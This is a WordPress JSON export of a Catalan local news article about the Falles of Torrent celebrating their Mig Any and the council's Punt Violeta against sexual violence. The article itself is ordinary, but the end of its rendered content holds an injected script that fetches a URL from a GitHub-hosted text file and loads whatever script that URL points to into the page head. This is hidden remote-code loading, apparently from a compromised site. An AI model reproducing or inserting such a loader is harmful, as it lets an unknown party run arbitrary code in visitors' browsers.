{"id":71902,"date":"2024-09-16T10:55:51","date_gmt":"2024-09-16T08:55:51","guid":{"rendered":"https:\/\/infotorrent.es\/?p=71902"},"modified":"2024-10-07T23:54:57","modified_gmt":"2024-10-07T21:54:57","slug":"les-falles-de-torrent-celebren-el-seu-mig-any","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/festes-i-tradicions-2\/les-falles-de-torrent-celebren-el-seu-mig-any\/","title":{"rendered":"Les Falles de Torrent celebren el seu Mig Any"},"content":{"rendered":"\n<p><strong>L&#8217;Ajuntament ha instal\u00b7lat per segon any consecutiu un Punt Violeta en l&#8217;\u00c0gora de Parc Central<\/strong><\/p>\n\n\n\n<p>Este dissabte, les falles de Torrent han celebrat una vegada m\u00e9s el seu tradicional Mig Any Faller, un esdeveniment que ha reunit a al voltant de 2.000 fallers i falleres de la ciutat. Enguany, l&#8217;organitzaci\u00f3 ha estat a c\u00e0rrec de 20 comissions falleres, i on tamb\u00e9 ha participat les seues m\u00e0ximes representants, Alicia Moreno i Ana Barber\u00e1, al costat de les seues respectives Corts d&#8217;Honor.<\/p>\n\n\n\n<p>La jornada festiva ha arrancat a la vesprada amb activitats per a totes les edats. Els m\u00e9s xicotets han disfrutat de l&#8217;animaci\u00f3 infantil, mentres que els m\u00e9s majors han participat d&#8217;un animat tardeo amb el grup local \u2018Va de Rumba\u2019 i els DJs torrentins \u2018PMK\u2019. El moment central de la celebraci\u00f3 ha sigut un multitudinari sopar de germanor en l&#8217;\u00c0gora de Parc Central, que ha donat pas a una animada revetla fins a les 3 de la matinada, amenitzada per l&#8217;Orquestra Sideral.<\/p>\n\n\n\n<p>El regidor de Falles, Aitor S\u00e1nchez, ha destacat la import\u00e0ncia del Mig Any com <strong>\u201cuna festa de germanor, la coordinaci\u00f3 de la qual naix d&#8217;entre totes les comissions falleres de la ciutat i marca l&#8217;inici del treball cap a les Falles 2025 i la volta als casals el mes de setembre\u201d.<\/strong> A m\u00e9s, despr\u00e9s de finalitzar la celebraci\u00f3, els servicis municipals s&#8217;han encarregat de netejar i deixar l&#8217;\u00c0gora de Parc Central en perfectes condicions. L&#8217;esdeveniment ha comptat amb la col\u00b7laboraci\u00f3 de Creu Roja i la Policia Local de Torrent, gr\u00e0cies als quals s&#8217;ha pogut celebrar sense cap mena d&#8217;incident.<\/p>\n\n\n\n<p><strong>Segon Mig Any amb Punt Violeta<\/strong><br>Per segon any consecutiu, l&#8217;Ajuntament de Torrent, a trav\u00e9s de la Casa de la Dona, ha instal\u00b7lat un Punt Violeta en l&#8217;esdeveniment, com a part de la col\u00b7laboraci\u00f3 entre el consistori i la Junta Local Fallera. Este espai, gestionat per personal qualificat, ha tingut com a objectiu assessorar, sensibilitzar i proporcionar suport a les persones que ho necessitaren durant la festa, en l\u00ednia amb el comprom\u00eds de toler\u00e0ncia zero a la viol\u00e8ncia contra les dones.<\/p>\n\n\n\n<p>La regidora d&#8217;Igualtat i Dona, Amparo Chust, ha declarat que<strong> \u201cl&#8217;objectiu principal \u00e9s previndre i sensibilitzar contra la viol\u00e8ncia sexual en espais d&#8217;oci, en l\u00ednia amb el nostre ferm comprom\u00eds d&#8217;erradicar la viol\u00e8ncia de g\u00e8nere a Torrent\u201d. <\/strong>El Punt Violeta tamb\u00e9 ha oferit material informatiu, marxandatge i activitats com a tallers de xapes per a la conscienciaci\u00f3.<\/p>\n\n\n\n<p>Finalment, l&#8217;Ajuntament ha recordat a la ciutadania que compta amb un Punt Violeta virtual, disponible les 24 hores del dia els 365 dies de l&#8217;any, a trav\u00e9s de l&#8217;enlla\u00e7: https:\/\/torrent.es\/punto-violeta\/.<\/p>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/AlexanderRPatton\/cdn\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>L&#8217;Ajuntament ha instal\u00b7lat per segon any consecutiu un Punt Violeta en l&#8217;\u00c0gora de Parc Central Este dissabte, les falles de Torrent han celebrat una vegada m\u00e9s el seu tradicional Mig Any Faller, un esdeveniment que ha reunit a al voltant de 2.000 fallers i falleres de la ciutat. Enguany, l&#8217;organitzaci\u00f3 ha estat a c\u00e0rrec de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":71910,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[156,1171,136,143],"tags":[],"class_list":["post-71902","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-festes-i-tradicions-2","category-fallas-ca","category-festes-i-turisme","category-fiestas-y-tradiciones"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/71902","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=71902"}],"version-history":[{"count":2,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/71902\/revisions"}],"predecessor-version":[{"id":72798,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/71902\/revisions\/72798"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/71910"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=71902"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=71902"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=71902"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}